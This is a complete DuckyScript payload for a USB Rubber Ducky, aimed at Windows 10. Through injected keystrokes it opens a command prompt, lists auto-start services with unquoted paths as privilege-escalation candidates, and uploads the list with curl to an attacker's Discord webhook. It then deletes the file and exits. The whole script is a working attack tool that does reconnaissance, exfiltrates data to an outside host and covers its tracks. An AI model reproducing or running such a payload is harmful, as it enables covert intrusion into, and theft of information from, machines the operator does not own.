REM     Title: Priv-Paths
REM     Author: atomiczsec
REM     Description: A payload to enumerate unqouted service paths for privilege escalation and send to a discord webhook.
REM     Target: Windows 10


REM Put your discord webook in this define variable, it has the name of "d" to minimize the typing time of the rubberducky
DEFINE #d YOUR-DISCORD-WEBHOOK

DELAY 3000
GUI r 
DELAY 1000
STRING cmd 
ENTER
DELAY 500
STRING cd %HOMEPATH%
ENTER
DELAY 1000
STRING wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v ^"^"^" > p.txt
ENTER
DELAY 1000
STRING curl.exe -F "payload_json={\"username\": \"p\", \"content\": \"**Paths**\"}" -F "file=@p.txt"
SPACE
STRING #d
ENTER
DELAY 200
STRING del p.txt
ENTER
DELAY 100
STRING exit
ENTER